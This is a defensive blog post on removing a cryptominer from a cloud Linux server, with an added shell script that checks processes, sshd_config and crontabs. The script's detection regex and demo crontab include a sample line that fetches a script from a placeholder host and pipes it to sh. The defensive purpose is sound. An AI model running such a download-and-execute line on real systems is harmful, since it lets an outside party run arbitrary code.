Preface

Alibaba Cloud suddenly sent a notification saying that the server was running a malicious mining program. Fortunately this was a test server and I had already backed up its data, so I could clean it up with peace of mind. Still, be careful: before any serious operation, remember to back up first.

The cleanup process

1. Check the server load and CPU utilization, and identify the mining process
  • Run top. A process called network01 was using 87% of the CPU, but I could not find it under /tmp.

  • Take the PID from the top output and look for the directory the process runs from. Run the command below; if the working directory does not make it obvious, the exe link shows where the executable file lives:
    ll /proc/<PID>

  • The exe link pointed to the network01 executable.

  • Force-kill the mining process and delete the mining program's executable file network01. If you are worried about deleting the wrong file, back it up first (otherwise it may leave you with regrets):
    kill -9 1459261

After killing the process, running top again showed that CPU usage had dropped back to normal.

2. Check whether the server's firewall rules contain the mining program's address, and remove any malicious address:
    iptables -L -n

3. Check whether the open ports and connections look abnormal:
    netstat -aulntp

At first I wondered what the IP address 133.11.244.74 was; after looking it up, I found it was my own public IP address. You can check your public IP address at ip138.com.

4. Check whether the attacker has added anything to the server's scheduled tasks, and deal with suspicious scheduled task files to prevent a second intrusion:
    crontab -l

and

    cat /etc/crontab

5. Check whether there are suspicious programs among the server's startup items, so that nothing comes back after the server restarts:
    cd /etc/init.d

    cat /etc/rc.d/rc.local

6. Check whether another root-level administrator account has been added to the Linux system:
    cat /etc/passwd   # username:password:UID:GID:home directory:login shell

7. Check whether remote root login is enabled in the SSH server configuration. PermitRootLogin should be set to no:
    cat /etc/ssh/sshd_config

8. Check whether the mining malware has planted a key in the SSH authorized keys, to prevent a persistent backdoor:
    cat /root/.ssh/authorized_keys

9. In the port security policy of the Alibaba Cloud security group, open port 80 and port 443, and for SSH and other ports allow only specific IP addresses. Before logging in to the server, add your own IP address in the Alibaba Cloud console, to reduce the chance of malicious logins as far as possible.

10. Check the server's security regularly: look for mining behaviour, check for Webshell backdoors, regularly upgrade the system version and patch vulnerabilities, and enable secondary password verification for the system's admin login while guarding against SQL injection vulnerabilities in the system. Also prevent the mining virus from repeatedly infecting other servers on the intranet.
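As an added example (not part of the original post), the POSIX shell helpers below automate the file-based checks from steps 1, 4 and 7: they flag process executables that are deleted or live in scratch directories, read the effective PermitRootLogin value the way sshd does (first uncommented occurrence wins), and grep a crontab for download-and-execute jobs. The sample sshd_config and crontab are constructed; the live process listing assumes Linux /proc and procps ps.

```shell
#!/bin/sh
# Triage helpers for the checks above. Added example, not from the original
# post; file-reading functions take a path so they also work on copied files.

# A miner binary is often a deleted file still running, or one dropped in a
# world-writable scratch directory. Return 0 (true) for such exe paths.
exe_path_is_suspicious() {
    case "$1" in
        *'(deleted)'*|/tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print the effective PermitRootLogin value from an sshd_config file.
# sshd honours the first uncommented occurrence, so a "no" further down
# does not override an earlier "yes".
effective_permit_root_login() {
    awk 'tolower($1)=="permitrootlogin"{print $2; exit}' "$1"
}

# Print cron lines that fetch-and-pipe to a shell, decode base64 payloads,
# or run from scratch dirs. Exit 0 if any were found, 1 if the file is clean.
suspicious_cron_lines() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" |
        grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/(tmp|dev/shm|var/tmp)/'
}

# Live check (Linux /proc, procps ps): top CPU consumers and where their
# binaries really live; run as root so every /proc/PID/exe link is readable.
top_cpu_processes() {
    ps -eo pid=,pcpu=,comm= --sort=-pcpu | head -n "${1:-5}" |
        while read -r pid pcpu comm; do
            exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')
            flag=''
            exe_path_is_suspicious "$exe" && flag=' <-- SUSPICIOUS'
            printf '%s %s%% %s %s%s\n' "$pid" "$pcpu" "$comm" "$exe" "$flag"
        done
}

# Constructed samples: a config where an early "yes" wins, and a crontab
# with one benign job and one download-and-execute dropper.
demo() {
    d=$(mktemp -d)
    printf '# excerpt\nPermitRootLogin yes\nPermitRootLogin no\n' > "$d/sshd_config"
    printf '0 3 * * * /usr/bin/backup\n* * * * * curl -fsSL http://example.invalid/x.sh | sh\n' > "$d/crontab"
    echo "PermitRootLogin: $(effective_permit_root_login "$d/sshd_config")"   # yes
    suspicious_cron_lines "$d/crontab" || echo 'crontab clean'
    rm -rf "$d"
}
if [ "${1:-}" = "--live" ]; then top_cpu_processes 5; else demo; fi
```

Run it with --live on the server itself to list the top CPU consumers with their resolved exe links; without arguments it only exercises the helpers on the constructed samples.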

Also refer to Alibaba Cloud's own documentation on handling mining programs: www.alibabacloud.com/help/zh/doc…

Conclusion

I deleted the mining program's executable file and force-killed the mining process; the scheduled tasks, startup items and other places showed nothing suspicious, so maybe the hacker, well… All in all, server security has to be done properly to keep servers from being attacked maliciously, and I hope this article is of some help to you!